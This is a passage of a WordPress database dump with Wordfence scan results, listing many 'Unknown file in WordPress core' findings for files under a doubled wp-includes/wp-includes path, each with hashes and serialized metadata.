not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-role.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77230,1675048814,1675048814,'new','knownfile',75,'f6b6fb60e85e85206974810aee0b198d','a4f684896f8093413cc560a337017f1a','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-roles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-roles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77231,1675048814,1675048814,'new','knownfile',75,'f12b27abdd06d872749835db35b43e00','67d655eb1a234275fb4e8ef761d34f36','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-session-tokens.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-session-tokens.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77232,1675048814,1675048814,'new','knownfile',75,'d409ce56062314c2dbeee3930ba227a4','12e055bf46f9e785f098fa2cd6c8799d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-simplepie-file.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-simplepie-file.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77233,1675048814,1675048814,'new','knownfile',75,'5143884bbc4adcbffde2ad7daa1e423e','7c7995df88cb7ea537fcc7dfcbb075ff','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77234,1675048814,1675048814,'new','knownfile',75,'49842ecc9a94475b04663d56cb3dcd08','3a471b17335b39bd08a7c842e157edbe','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-site-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-site-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77235,1675048814,1675048814,'new','knownfile',75,'e622d8d6ff0a18aa0af79ffd4af71c22','eadef06e166e249e719ae0cc5fad332c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-site.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-site.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77236,1675048814,1675048814,'new','knownfile',75,'f3f612ca95ecce0dc57e1e4decaf4fe9','88499bb4caef1a4500be99a92da88026','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-tax-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-tax-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77237,1675048814,1675048814,'new','knownfile',75,'e5983fe80e12b944d6eb52d239b3ea7e','026dca1a5226de2f52a76d68606db339','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-taxonomy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/class-wp-taxonomy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77238,1675048814,1675048814,'new','knownfile',75,'fbcbd0479faa9cdd5f73118793e50b44','497da53fd4160e0915c74fbf974752a6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-term-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-term-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77239,1675048814,1675048814,'new','knownfile',75,'d7eb77323ce4cf9814176466482ffe23','c65c0e0c993f6bbdfac06802115f6676','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-term.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-term.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77240,1675048815,1675048815,'new','knownfile',75,'b6097c8e96bff41fbf3f2ec5fbfd0915','cc47083706e3f74172717ca739a5078d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77241,1675048815,1675048815,'new','knownfile',75,'5efb19a5d32bf1406f2788065ce2873e','8f2ba1b4b3a36fdd24aebd2cd15e71a7','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-text-diff-renderer-table.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/class-wp-text-diff-renderer-table.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77242,1675048815,1675048815,'new','knownfile',75,'a61f2721b9f6d666c8ba3cd0ab8b18c8','b1a40f1a3b8ddd60ae92a9f2528b08fa','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-theme.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-theme.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77243,1675048815,1675048815,'new','knownfile',75,'ca03eed53bdfcd23afb4914eac4a11a0','da1c2e5dbaf61733c0a2cbfecefa5bfb','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-meta-session-tokens.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/class-wp-user-meta-session-tokens.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77244,1675048815,1675048815,'new','knownfile',75,'7d7338720b371bc706c62e4e570a9e81','1ee72b01e3bb4d63dbddd096e10f2d0c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-user-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77245,1675048815,1675048815,'new','knownfile',75,'fe5da5c7437c28383d1ee2a9dd038bd4','b48b83eeec9c77ea788e7740aea8b79c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-user-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77246,1675048815,1675048815,'new','knownfile',75,'12dd0cf73ba278bf78ec372154eb1e4c','5a6dee6b45327475acb6a1ec8b90ee92','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-user.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77247,1675048815,1675048815,'new','knownfile',75,'75fa282baddaa8ac806e181e4c4f0d03','9aee99f809bb2999b6b9090640f76356','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-walker.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-walker.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77248,1675048815,1675048815,'new','knownfile',75,'c26216a1c55064173a7aaeae8db974d5','b0fda41ea3315690b2b3b072f4730cf3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-widget-factory.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-widget-factory.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77249,1675048815,1675048815,'new','knownfile',75,'823ea618da74c2eeb3b01576c8c33dab','99b81f48c6ada10dbdb5e029f726e173','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-widget.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-widget.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77250,1675048815,1675048815,'new','knownfile',75,'a1b773dc6b371f44dbd7b33888598f9c','21bd578467de26221fd9b23dbfbc9918','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-xmlrpc-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-xmlrpc-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77251,1675048815,1675048815,'new','knownfile',75,'891c8a5dd60e0ba3e9c8a5732d64b8eb','cca00a349d565ac6a8d622a85fc4798d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/class-wp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77252,1675048815,1675048815,'new','knownfile',75,'9ce3599086f57775e4f19e419cdc2e39','0352f0866b3e26b348b681b382ff0d2d','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-dependencies.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class.wp-dependencies.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77253,1675048815,1675048815,'new','knownfile',75,'fb84acc51bab8c80f6171f92af798d32','53b5fdde2ccb9d6763fb1c6eafc9f076','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-scripts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class.wp-scripts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77254,1675048815,1675048815,'new','knownfile',75,'1cd6c0fb120038723cfbf0dbe866103a','6fdb751db29d64ff34269db971d48483','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-styles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class.wp-styles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77255,1675048816,1675048816,'new','knownfile',75,'ce32fe6706c75236eed6459d8bb85750','1bf3fdd2528abab313ed60df5f6beafa','Unknown file in WordPress core: wp-includes/wp-includes/comment-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/comment-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77256,1675048816,1675048816,'new','knownfile',75,'1c119c7d7a202ae29c6f3928c260d700','7e641e464e9de3098706a385465e863d','Unknown file in WordPress core: wp-includes/wp-includes/comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77257,1675048816,1675048816,'new','knownfile',75,'e761ee39c6a03141aecbd20b1d98ef89','16618b570c06f6ace343eb55deb2ff2a','Unknown file in WordPress core: wp-includes/wp-includes/compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77258,1675048816,1675048816,'new','knownfile',75,'4fe7110b55a836ed5ffb5e6dcce5ffeb','405f3eba08bf8129aa63d98f05d72374','Unknown file in WordPress core: wp-includes/wp-includes/cron.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/cron.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77259,1675048816,1675048816,'new','knownfile',75,'51a21370f61415c0ae3c2755bb03803d','00ed3fc970675eadf427a99a0c4fdb22','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/admin-bar-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77260,1675048816,1675048816,'new','knownfile',75,'70895e53d1d8dc9249c0ee1d5aacec02','1720e04b888a607225e4a5dad7cfe06b','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/admin-bar-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77261,1675048816,1675048816,'new','knownfile',75,'6a0d51133df33bcb9a62d9da35223af4','28f6d8366c8998ee149eea8593dc9130','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/css/admin-bar.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77262,1675048816,1675048816,'new','knownfile',75,'1d3442ac03839f952efc77bb08c7528d','63405de0472eb6630c5f5100f0cb4eb9','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/admin-bar.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77263,1675048816,1675048816,'new','knownfile',75,'195bece47da8f5601e156127b39df4b1','3ec439475fa4db394c1e8eff751e049b','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/buttons-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77264,1675048816,1675048816,'new','knownfile',75,'ba26fe7a58414cf93c1624b8263c74f4','1ccb26b0eb6b0e15e228810f9f33d5ae','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/buttons-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77265,1675048816,1675048816,'new','knownfile',75,'b3ccbc737e26770ec44b8468602d6d8d','a5ddb1da98d63723ecbbbc6831d94a0a','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/css/buttons.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77266,1675048816,1675048816,'new','knownfile',75,'39896f81d8741260f57039e45020cd6d','3614c0494170c462569e4e541461c3fa','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/buttons.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77267,1675048816,1675048816,'new','knownfile',75,'fb03681ca75151ed018505f819a2564d','e79ac9419abc3fb7dfaf3354f21c899c','Unknown 